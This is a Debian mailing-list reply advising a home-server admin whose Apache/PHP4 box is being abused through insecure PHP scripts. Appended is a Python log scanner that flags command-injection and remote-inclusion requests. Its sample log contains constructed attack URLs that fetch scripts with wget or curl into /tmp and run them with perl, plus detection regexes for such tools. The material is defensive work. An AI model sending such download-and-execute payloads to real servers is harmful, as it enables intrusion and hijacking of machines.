
Re: security issues with apache!

This one time, at band camp, Josep Serrano said:
> Hello Petter,
> We still don't know what you use your Apache for. Most of the problems come from
> poor PHP scripts. What scripts/services are you running on this server?

I strongly suggest this as the source of your problems.  In my
experience, PHP apps do not take the care to sanitize input before
executing it.  Look in your access logs for exec commands or wget
commands.  Figure out which script was attacked, and fix or disable it.

> > Hi
> >
> > I'm not completely new to Debian or Linux, but I wouldn't classify
> > myself as a battlescarred sysadmin just yet :)
> >
> > Anyways. My problem is security-related, and I hope that I'm posting to
> > the correct list as well as hoping that someone can help me out here.
> >
> > Recently I've noticed that my Apache-installation gets violated and that
> > an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> > makes Apache execute these. Unfortunately these are some rather nasty
> > things, mostly portscanners and bruteforce-attacks. They are all easily
> > detected with netstat, and at least once a day I have to go in and kill
> > the processes spawned by www-data (the user that runs Apache) as well as
> > delete the offending files.
> >
> > Now, like I said - I'm not a pro, I'm trying to learn by doing.
> > Unfortunately how this happens is way over my experience, and now I
> > could really use some help in fixing this leak. I've narrowed it down to
> > Apache only, but I have no clue as to how to seal the leak. I'm running
> > a small server in my home using (mostly) Debian Sarge. This is a real
> > Frankenstein-machine as it was originally a Woody-box, but it's been
> > upgraded with bits from all over. It's been running pretty much
> > constantly for three years. Of course I apply security fixes when they
> > arrive, but I don't know if the source of these intrusions is Apache or
> > just that I have managed to fubar some setting somewhere, allowing an
> > attacker to make Apache execute code.
> >
> > Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> > other services running on it, but I've noticed that the
> > intrusions/code-executions only happen through Apache. MySQL only
> > listens on localhost and accepts no connections from the outside. Hence,
> > I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> > PHP 4.3.
> >
> > I deeply appreciate any help that can make me seal this leak! Thank you
> > all in advance!
> >
> > /petter senften
> >

|   ,''`.                                            Stephen Gran |
|  : :' :                                        sgran@debian.org |
|  `. `'                        Debian user, admin, and developer |
|    `-                                     http://www.debian.org |

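The advice above (search the access log for wget/exec-style requests and work out which script is being hit) as an added example; this is not code from the thread, from Debian, or from the poster's server. It is a Python 3 script that parses Apache 1.3 "combined" access-log lines, URL-decodes the request (twice, so double-encoded payloads are caught too), flags lines that carry command-execution or payload-download indicators, and tallies the hits per script so the attacked PHP file stands out. The log lines below are constructed for the example (documentation IP ranges, made-up script names); the indicator names are labels chosen here, not Apache or PHP terms. Python 3 will not run on a Sarge box, so copy the log to a current machine, or adapt the regexes to grep.

```python
#!/usr/bin/env python3
"""Scan Apache combined-format access logs for command-injection / RFI attempts.

Added example, not from the original thread. Sample data and indicator
names are constructed for illustration.
"""
import re
import sys
from urllib.parse import unquote, unquote_plus

# Constructed sample log (documentation IP ranges; the paths are invented).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Mar/2006:03:12:45 +0100] "GET /index.php?page=about HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2006:03:13:01 +0100] "GET /gallery/view.php?img=x;wget%20http://198.51.100.9/bot.txt%20-O%20/tmp/.x;perl%20/tmp/.x HTTP/1.0" 200 512 "-" "libwww-perl/5.79"
192.0.2.11 - - [10/Mar/2006:03:14:22 +0100] "GET /news.php?id=3 HTTP/1.1" 200 1876 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2006:03:15:09 +0100] "GET /admin/cmd.php?cmd=cd%20/var/tmp;curl%20http://203.0.113.8/s.pl|perl HTTP/1.0" 200 45 "-" "Wget/1.9"
"""

# Apache "combined" log format (LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"").
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Indicators applied to the decoded request target (path + query).
# "strong" ones are enough to flag a line on their own; "cmd_chain" alone
# is too noisy (';' and '|' occur in legitimate URLs) and is only reported
# as supporting context.
INDICATORS = [
    ("wget",        re.compile(r'\bwget\b')),                       # payload download
    ("curl",        re.compile(r'\bcurl\b')),                       # payload download
    ("tmp_path",    re.compile(r'/(?:var/)?tmp\b')),                # drop into /tmp or /var/tmp
    ("interpreter", re.compile(r'\b(?:perl|sh|bash|python)\b')),    # running the dropped file
    ("php_exec",    re.compile(r'\b(?:exec|system|passthru|shell_exec|popen)\s*\(')),  # PHP code injected via eval/include
    ("remote_url",  re.compile(r'=\s*(?:https?|ftp)://', re.I)),    # remote file inclusion
    ("cmd_chain",   re.compile(r'[;|`]|\$\(')),                     # shell metacharacters
]
WEAK = {"cmd_chain"}


def decode_target(target):
    """Split the request target into path and query, URL-decoding each twice
    so that %2520-style double encoding does not hide the payload."""
    path, _, query = target.partition('?')
    path = unquote(unquote(path))            # '+' is literal in a path
    query = unquote_plus(unquote_plus(query))  # '+' means space in a query
    return path, query


def scan_line(line):
    """Return a hit record for a suspicious log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, query = decode_target(m.group('target'))
    text = path + ('?' + query if query else '')
    found = [name for name, rx in INDICATORS if rx.search(text)]
    if not [n for n in found if n not in WEAK]:
        return None
    return {
        'ip': m.group('ip'),
        'time': m.group('time'),
        'script': path,            # the script that was attacked
        'status': int(m.group('status')),
        'agent': m.group('agent') or '',
        'indicators': found,
        'decoded': text,
    }


def scan_log(text):
    """Scan a whole log and return the list of hits in file order."""
    return [h for h in (scan_line(l) for l in text.splitlines()) if h]


def by_script(hits):
    """Count hits per attacked script so the worst offender is obvious."""
    counts = {}
    for h in hits:
        counts[h['script']] = counts.get(h['script'], 0) + 1
    return counts


if __name__ == '__main__':
    # Usage: scan_access_log.py [/var/log/apache/access.log]; no argument scans the sample.
    data = open(sys.argv[1], errors='replace').read() if len(sys.argv) > 1 else SAMPLE_LOG
    hits = scan_log(data)
    for h in hits:
        print(f"{h['time']} {h['ip']} {h['status']} {h['script']} [{', '.join(h['indicators'])}]")
        print(f"    {h['decoded']}")
    print("hits per script:", by_script(hits))
```

A status of 200 on a flagged line, as in the two sample hits, means the script accepted the request; it is the one to fix or disable. Lines that only trip `cmd_chain` are deliberately not reported, and a 404 on a flagged line still tells you the box is being scanned even though that particular script does not exist. POST bodies are not in the access log at all, so a clean log does not prove the application is clean.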